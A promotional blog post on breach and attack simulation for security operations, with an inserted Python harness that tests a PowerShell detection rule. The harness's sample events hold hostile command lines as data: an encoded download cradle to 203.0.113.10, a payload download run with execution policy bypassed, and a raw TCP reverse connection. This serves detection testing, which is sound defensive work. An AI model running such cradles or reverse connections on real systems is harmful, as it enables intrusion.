Recent years have seen the security industry move from periodic, point-in-time security decisions to a continuous, adaptive approach, as outlined in Gartner’s CARTA (Continuous Adaptive Risk and Trust Assessment) model. Echoing this approach, breach and attack simulation (BAS) tools have emerged to offer organizations automated, continuous testing of security control effectiveness.
Complementing periodic point-in-time assessments and exercises such as pen tests and red teaming, continuous security testing is the practice of challenging, measuring and optimizing the effectiveness of security controls on an ongoing basis, so that security gaps are uncovered as soon as they emerge and can be fixed quickly.
Gaining Back the Advantage of Time
According to a recent poll, when it comes to testing security controls, most organizations test on a quarterly basis at best. However, IT environments change frequently, new malware strains are released daily, and attacker techniques continue to evolve. A point-in-time snapshot is only valid until the next configuration change or the next new technique, so the assessments that produce them cannot provide visibility into an organization’s true, real-time security posture.
By proactively challenging and testing controls before attackers do, organizations can start to take back the advantage of time. Instead of waiting for the next pen test or red team exercise to find out how effective their security controls are, practitioners can get the 24x7x365 visibility they need to gain the upper hand.
To this end, security testing should be part of everyday activities, and should empower security operations center (SOC) analysts to continually reduce their organization’s attack surface.
How BAS Enhances Your SOC
Much like crash testing a car, the only way to know the strength of your controls is to test them, and then take the appropriate corrective steps.
By integrating BAS into their current infrastructure, SOC teams can:
- Assess effectiveness of preventive controls – Are your email gateway and sandbox effective at identifying and blocking risky emails with suspicious attachments? Does your web gateway prevent access to malicious websites? Do your IPS and endpoint AV actually block the exploit and malware samples they claim to cover?
- Assess effectiveness of detection controls – Are behavior-based detection tools doing their job by identifying risky activities, such as unusual PowerShell command lines or beaconing to command-and-control (C2) servers? This is relevant for tools such as EDR, UEBA and deception honeypots, as well as other analytics engines, including machine-learning based ones.
- Assess effectiveness of post-breach controls – If a system in your network is compromised, can further damage be avoided? Can your firewall and infrastructure settings block lateral movement? Will your DLP block stealthy attempts to exfiltrate sensitive data outside of your network, for example using steganography and other methods?
- Assess effectiveness of the monitoring and response workflows – Are alerts and follow up actions clear to your incident response staff? Are there playbooks in your SOAR solution that should be refined?
- Compare security product effectiveness – How do you select among comparable security products objectively? By performing the same set of attack simulations on similar products, you can determine which one is stronger based on vendor-agnostic empirical data.
- Gain automated reporting and metrics – Until recently, objectively reporting on the performance of your security controls was difficult. BAS platforms can be leveraged to automatically deliver executive- and technical-level briefs, and the latter can be integrated into your SIEM or other controls. Benchmarking against industry peers can help you understand your cyber stance, and exposure scores monitored over time can help demonstrate effective spending.
- Prioritize mitigation efforts – BAS helps teams prioritize remediation efforts, by showing practitioners where their risk exposure score is highest. By tackling the highest risk gaps first, practitioners can allocate their time and resources according to where they would have the most impact.
- Ensure defensibility against the latest threats – New APT, ransomware and Trojan variants emerge weekly, sporting new indicators of compromise (IoCs) and evolving techniques. By continually challenging controls against simulations of these strains, security teams can defend against these attacks faster—and thus shrink the window of opportunity for the bad guys.
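The detection-control check in the list above, as an added example that is not from the original post or from any BAS product: a small Python harness that runs a PowerShell-focused detection rule over constructed process-creation command lines, each tagged with the BAS scenario that produced it, and reports which scenarios were detected, which were missed, and whether a benign baseline triggered a false positive. The scenario IDs, the 203.0.113.10 address and the command lines are all constructed for illustration.

```python
import base64
import re

# Added example, not from the original post or any BAS product. Everything here
# (scenario IDs, the 203.0.113.10 address, the command lines) is constructed.

# Substrings that typically indicate a PowerShell download cradle or in-memory loader.
CRADLE_TOKENS = (
    "net.webclient", "downloadstring", "downloadfile", "invoke-webrequest",
    "invoke-expression", "iex ", "iex(", "frombase64string", "reflection.assembly",
)

# -EncodedCommand and the shortened forms powershell.exe accepts for it.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
NOPROFILE_RE = re.compile(r"(?i)-nop(?:rofile)?\b")

# Constructed BAS scenarios: ID -> what the simulated technique does.
SCENARIOS = {
    "BAS-PS-001": "encoded download cradle launched with a hidden window",
    "BAS-PS-002": "plaintext Invoke-WebRequest payload download",
    "BAS-PS-003": "raw TCP reverse connection via .NET sockets",
}


def encode_for_powershell(script):
    """Build an -EncodedCommand argument the way PowerShell expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed.
    Decoding as UTF-8 instead of UTF-16LE would yield NUL-interleaved text and hide
    every keyword, which is a common reason encoded cradles slip past content rules."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(cmdline):
    """Apply the rules to one process-creation command line; return the rule names
    that fired (an empty list means the event was not flagged)."""
    hits = []
    # Search the plaintext part with the base64 blob removed so base64 noise cannot match.
    plain = ENC_RE.sub(" ", cmdline).lower()
    if any(tok in plain for tok in CRADLE_TOKENS):
        hits.append("download_cradle")
    decoded = decode_encoded_command(cmdline)
    if decoded and any(tok in decoded.lower() for tok in CRADLE_TOKENS):
        hits.append("encoded_download_cradle")
    if HIDDEN_RE.search(cmdline) and NOPROFILE_RE.search(cmdline):
        hits.append("stealth_launch_flags")
    return hits


def sample_events():
    """Constructed 4688-style command lines, each tagged with the scenario that ran it
    (None marks benign baseline activity that must not be flagged)."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
    return [
        ("BAS-PS-001", "powershell.exe -nop -w hidden -enc " + encode_for_powershell(cradle)),
        ("BAS-PS-002", r'powershell.exe -ExecutionPolicy Bypass -Command "Invoke-WebRequest '
                       r'-Uri http://203.0.113.10/b.bin -OutFile $env:TEMP\b.exe"'),
        ("BAS-PS-003", "powershell.exe -nop -c \"$c = New-Object "
                       "System.Net.Sockets.TCPClient('203.0.113.10', 4444)\""),
        (None, r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"),
    ]


def validate(scenarios, events):
    """Correlate each scenario with the detections it produced. Returns the per-scenario
    hits, the undetected scenarios (the gaps to remediate first), any benign event that
    was flagged, and the fraction of scenarios detected. Real BAS platforms correlate by
    tagging payloads or by time window against the SIEM; here the tag is explicit."""
    detected = {sid: [] for sid in scenarios}
    false_positives = []
    for scenario_id, cmdline in events:
        hits = detect(cmdline)
        if scenario_id is None:
            if hits:
                false_positives.append(cmdline)
        else:
            detected.setdefault(scenario_id, []).extend(hits)
    gaps = [sid for sid, hits in detected.items() if not hits]
    coverage = (len(detected) - len(gaps)) / len(detected) if detected else 0.0
    return {"detected": detected, "gaps": gaps,
            "false_positives": false_positives, "coverage": coverage}


if __name__ == "__main__":
    report = validate(SCENARIOS, sample_events())
    for sid, hits in report["detected"].items():
        print(f"{sid}: {'DETECTED ' + ', '.join(hits) if hits else 'MISSED'}  ({SCENARIOS.get(sid, '?')})")
    print(f"coverage={report['coverage']:.0%} gaps={report['gaps']} false_positives={len(report['false_positives'])}")
```

Two details carry the lesson. First, the decode step: PowerShell's -EncodedCommand wraps UTF-16LE text, so a rule that base64-decodes as UTF-8 and then searches for keywords will miss every encoded cradle. Second, the undetected BAS-PS-003 is exactly the output this loop exists to produce: a concrete, reproducible gap (a raw .NET socket connection is not covered by the cradle rule) that can be turned into a new detection and re-tested, rather than a vague sense that "PowerShell is monitored".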
The Bottom Line
Prevention, detection and remediation controls can be enhanced using BAS-generated insights.
As SIEM and SOAR platforms serve as the heart of the SOC, validating that they actually receive the events and raise the alerts a simulated attack should produce is vital to ensuring their effectiveness, and to refining the incident-response playbooks defined in the SOAR. In addition, security teams can enrich their current SIEM and SOAR solutions with BAS-generated data fed in via API.
In a similar vein, exposure data uncovered by vulnerability management solutions can be correlated with attack simulation results to better prioritize and accelerate remediation: a vulnerability on a host where the simulated attack also went undetected ranks higher than one the surrounding controls demonstrably catch. By leveraging the automated testing, reporting and alerting of BAS solutions, you can continually reduce your attack surface and best position yourself to defend against sophisticated cyberattacks, while improving cyber security ROI, cross-team communication and management buy-in.
To get started with Gartner-recognized, award-winning BAS technology, sign up for a live demo today.